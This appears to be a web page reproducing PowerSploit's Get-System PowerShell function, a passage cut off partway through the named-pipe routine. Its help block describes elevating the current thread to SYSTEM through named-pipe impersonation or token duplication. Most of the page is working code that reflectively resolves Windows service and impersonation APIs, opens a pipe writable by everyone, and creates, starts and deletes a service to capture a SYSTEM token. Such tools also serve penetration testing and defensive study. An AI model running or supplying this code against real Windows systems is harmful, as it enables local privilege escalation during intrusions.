<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Powershell - Get-System</title>
</head><body>function Get-System {<br/>
&lt;#<br/>
&nbsp; &nbsp; .SYNOPSIS<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; GetSystem functionality inspired by Meterpreter's getsystem.<br/>
&nbsp; &nbsp; &nbsp; &nbsp; 'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create<br/>
&nbsp; &nbsp; &nbsp; &nbsp; a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege.<br/>
&nbsp; &nbsp; &nbsp; &nbsp; NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure<br/>
&nbsp; &nbsp; &nbsp; &nbsp; token duplication works correctly.<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; PowerSploit Function: Get-System<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Author: @harmj0y, @mattifestation<br/>
&nbsp; &nbsp; &nbsp; &nbsp; License: BSD 3-Clause<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Required Dependencies: None<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Optional Dependencies: None<br/>
<br/>
&nbsp; &nbsp; .PARAMETER Technique<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; The technique to use, 'NamedPipe' or 'Token'.<br/>
<br/>
&nbsp; &nbsp; .PARAMETER ServiceName<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; The name of the service used with named pipe impersonation, defaults to 'TestSVC'.<br/>
<br/>
&nbsp; &nbsp; .PARAMETER PipeName<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'.<br/>
<br/>
&nbsp; &nbsp; .PARAMETER RevToSelf<br/>
&nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; Reverts the current thread privileges.<br/>
<br/>
&nbsp; &nbsp; .PARAMETER WhoAmI<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Switch. Display the credentials for the current PowerShell thread.<br/>
<br/>
&nbsp; &nbsp; .EXAMPLE<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; PS&gt; Get-System<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Uses named impersonate to elevate the current thread token to SYSTEM.<br/>
<br/>
&nbsp; &nbsp; .EXAMPLE<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; PS&gt; Get-System -ServiceName 'PrivescSvc' -PipeName 'secret'<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Uses named impersonate to elevate the current thread token to SYSTEM<br/>
&nbsp; &nbsp; &nbsp; &nbsp; with a custom service and pipe name.<br/>
<br/>
&nbsp; &nbsp; .EXAMPLE<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; PS&gt; Get-System -Technique Token<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Uses token duplication to elevate the current thread token to SYSTEM.<br/>
<br/>
&nbsp; &nbsp; .EXAMPLE<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; PS&gt; Get-System -WhoAmI<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Displays the credentials for the current thread.<br/>
<br/>
&nbsp; &nbsp; .EXAMPLE<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; PS&gt; Get-System -RevToSelf<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Reverts the current thread privileges.<br/>
<br/>
&nbsp; &nbsp; .LINK<br/>
&nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c<br/>
&nbsp; &nbsp; &nbsp; &nbsp; https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot<br/>
&nbsp; &nbsp; &nbsp; &nbsp; http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/<br/>
&nbsp; &nbsp; &nbsp; &nbsp; http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/<br/>
#&gt;<br/>
&nbsp; &nbsp; [CmdletBinding(DefaultParameterSetName = 'NamedPipe')]<br/>
&nbsp; &nbsp; param(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [Parameter(ParameterSetName = "NamedPipe")]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [Parameter(ParameterSetName = "Token")]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [String]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [ValidateSet("NamedPipe", "Token")]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Technique = 'NamedPipe',<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [Parameter(ParameterSetName = "NamedPipe")]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [String]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $ServiceName = 'TestSVC',<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [Parameter(ParameterSetName = "NamedPipe")]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [String]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $PipeName = 'TestSVC',<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [Parameter(ParameterSetName = "RevToSelf")]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [Switch]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $RevToSelf,<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [Parameter(ParameterSetName = "WhoAmI")]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [Switch]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $WhoAmI<br/>
&nbsp; &nbsp; )<br/>
<br/>
&nbsp; &nbsp; $ErrorActionPreference = "Stop"<br/>
<br/>
&nbsp; &nbsp; # from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html<br/>
&nbsp; &nbsp; function Local:Get-DelegateType<br/>
&nbsp; &nbsp; {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Param<br/>
&nbsp; &nbsp; &nbsp; &nbsp; (<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [OutputType([Type])]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Parameter( Position = 0)]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Type[]]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Parameters = (New-Object Type[](0)),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Parameter( Position = 1 )]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Type]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $ReturnType = [Void]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; )<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Domain = [AppDomain]::CurrentDomain<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $MethodBuilder.SetImplementationFlags('Runtime, Managed')<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; Write-Output $TypeBuilder.CreateType()<br/>
&nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; # from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html<br/>
&nbsp; &nbsp; function Local:Get-ProcAddress<br/>
&nbsp; &nbsp; {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Param<br/>
&nbsp; &nbsp; &nbsp; &nbsp; (<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [OutputType([IntPtr])]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Parameter( Position = 0, Mandatory = $True )]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [String]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Module,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Parameter( Position = 1, Mandatory = $True )]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [String]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Procedure<br/>
&nbsp; &nbsp; &nbsp; &nbsp; )<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; # Get a reference to System.dll in the GAC<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')<br/>
&nbsp; &nbsp; &nbsp; &nbsp; # Get a reference to the GetModuleHandle and GetProcAddress methods<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')<br/>
&nbsp; &nbsp; &nbsp; &nbsp; # Get a handle to the module specified<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $tmpPtr = New-Object IntPtr<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; # Return the address of the function<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))<br/>
&nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; # performs named pipe impersonation to elevate to SYSTEM without needing<br/>
&nbsp; &nbsp; # &nbsp; SeDebugPrivilege<br/>
&nbsp; &nbsp; function Local:Get-SystemNamedPipe {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; param(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [String]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $ServiceName = "TestSVC",<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [String]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $PipeName = "TestSVC"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; )<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Command = "%COMSPEC% /C start %COMSPEC% /C `"timeout /t 3 &gt;nul&amp;&amp;echo $PipeName &gt; \\.\pipe\$PipeName`""<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; # create the named pipe used for impersonation and set appropriate permissions<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $PipeSecurity = New-Object System.IO.Pipes.PipeSecurity<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $AccessRule = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $PipeSecurity.AddAccessRule($AccessRule)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName,"InOut",100, "Byte", "None", 1024, 1024, $PipeSecurity)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $PipeHandle = $Pipe.SafePipeHandle.DangerousGetHandle()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; # Declare/setup all the needed API function<br/>
&nbsp; &nbsp; &nbsp; &nbsp; # &nbsp; adapted heavily from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html <br/>
&nbsp; &nbsp; &nbsp; &nbsp; $ImpersonateNamedPipeClientAddr = Get-ProcAddress Advapi32.dll ImpersonateNamedPipeClient<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $ImpersonateNamedPipeClientDelegate = Get-DelegateType @( [Int] ) ([Int])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $ImpersonateNamedPipeClient = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateNamedPipeClientAddr, $ImpersonateNamedPipeClientDelegate)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $CloseServiceHandleAddr = Get-ProcAddress Advapi32.dll CloseServiceHandle<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $CloseServiceHandleDelegate = Get-DelegateType @( [IntPtr] ) ([Int])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $CloseServiceHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseServiceHandleAddr, $CloseServiceHandleDelegate)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $OpenSCManagerAAddr = Get-ProcAddress Advapi32.dll OpenSCManagerA<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $OpenSCManagerADelegate = Get-DelegateType @( [String], [String], [Int]) ([IntPtr])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $OpenSCManagerA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenSCManagerAAddr, $OpenSCManagerADelegate)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; $OpenServiceAAddr = Get-ProcAddress Advapi32.dll OpenServiceA<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $OpenServiceADelegate = Get-DelegateType @( [IntPtr], [String], [Int]) ([IntPtr])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $OpenServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenServiceAAddr, $OpenServiceADelegate)<br/>
&nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; $CreateServiceAAddr = Get-ProcAddress Advapi32.dll CreateServiceA<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $CreateServiceADelegate = Get-DelegateType @( [IntPtr], [String], [String], [Int], [Int], [Int], [Int], [String], [String], [Int], [Int], [Int], [Int]) ([IntPtr])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $CreateServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateServiceAAddr, $CreateServiceADelegate)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $StartServiceAAddr = Get-ProcAddress Advapi32.dll StartServiceA<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $StartServiceADelegate = Get-DelegateType @( [IntPtr], [Int], [Int]) ([IntPtr])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $StartServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StartServiceAAddr, $StartServiceADelegate)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $DeleteServiceAddr = Get-ProcAddress Advapi32.dll DeleteService<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $DeleteServiceDelegate = Get-DelegateType @( [IntPtr] ) ([IntPtr])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $DeleteService = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DeleteServiceAddr, $DeleteServiceDelegate)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $GetLastErrorAddr = Get-ProcAddress Kernel32.dll GetLastError<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $GetLastErrorDelegate = Get-DelegateType @() ([Int])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $GetLastError = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetLastErrorAddr, $GetLastErrorDelegate)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; # Step 1 - OpenSCManager()<br/>
&nbsp; &nbsp; &nbsp; &nbsp; # 0xF003F = SC_MANAGER_ALL_ACCESS<br/>
&nbsp; &nbsp; &nbsp; &nbsp; # &nbsp; http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Opening service manager"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $ManagerHandle = $OpenSCManagerA.Invoke("\\localhost", "ServicesActive", 0xF003F)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Service manager handle: $ManagerHandle"<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; # if we get a non-zero handle back, everything was successful<br/>
&nbsp; &nbsp; &nbsp; &nbsp; if ($ManagerHandle -and ($ManagerHandle -ne 0)) {<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Step 2 - CreateService()<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # 0xF003F = SC_MANAGER_ALL_ACCESS<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # 0x10 = SERVICE_WIN32_OWN_PROCESS<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # 0x3 = SERVICE_DEMAND_START<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # 0x1 = SERVICE_ERROR_NORMAL<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Creating new service: '$ServiceName'"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; try {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $ServiceHandle = $CreateServiceA.Invoke($ManagerHandle, $ServiceName, $ServiceName, 0xF003F, 0x10, 0x3, 0x1, $Command, $null, $null, $null, $null, $null)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $err = $GetLastError.Invoke()<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; catch {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Warning "Error creating service : $_"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $ServiceHandle = 0<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "CreateServiceA Handle: $ServiceHandle"<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ($ServiceHandle -and ($ServiceHandle -ne 0)) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Success = $True<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Service successfully created"<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Step 3 - CloseServiceHandle() for the service handle<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Closing service handle"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Null = $CloseServiceHandle.Invoke($ServiceHandle)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Step 4 - OpenService()<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Opening the service '$ServiceName'"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $ServiceHandle = $OpenServiceA.Invoke($ManagerHandle, $ServiceName, 0xF003F)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "OpenServiceA handle: $ServiceHandle"<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ($ServiceHandle -and ($ServiceHandle -ne 0)){<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Step 5 - StartService()<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Starting the service"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $val = $StartServiceA.Invoke($ServiceHandle, $null, $null)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $err = $GetLastError.Invoke()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # if we successfully started the service, let it breathe and then delete it<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ($val -ne 0){<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Service successfully started"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # breathe for a second<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Start-Sleep -s 1<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else{<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ($err -eq 1053){<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Command didn't respond to start"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else{<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Warning "StartService failed, LastError: $err"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # breathe for a second<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Start-Sleep -s 1<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # start cleanup<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Step 6 - DeleteService()<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Deleting the service '$ServiceName'"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $val = $DeleteService.invoke($ServiceHandle)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $err = $GetLastError.Invoke()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ($val -eq 0){<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Warning "DeleteService failed, LastError: $err"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else{<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Service successfully deleted"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Step 7 - CloseServiceHandle() for the service handle <br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Closing the service handle"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $val = $CloseServiceHandle.Invoke($ServiceHandle)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Service handle closed off"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Warning "[!] OpenServiceA failed, LastError: $err"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Warning "[!] CreateService failed, LastError: $err"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # final cleanup - close off the manager handle<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Closing the manager handle"<br/>
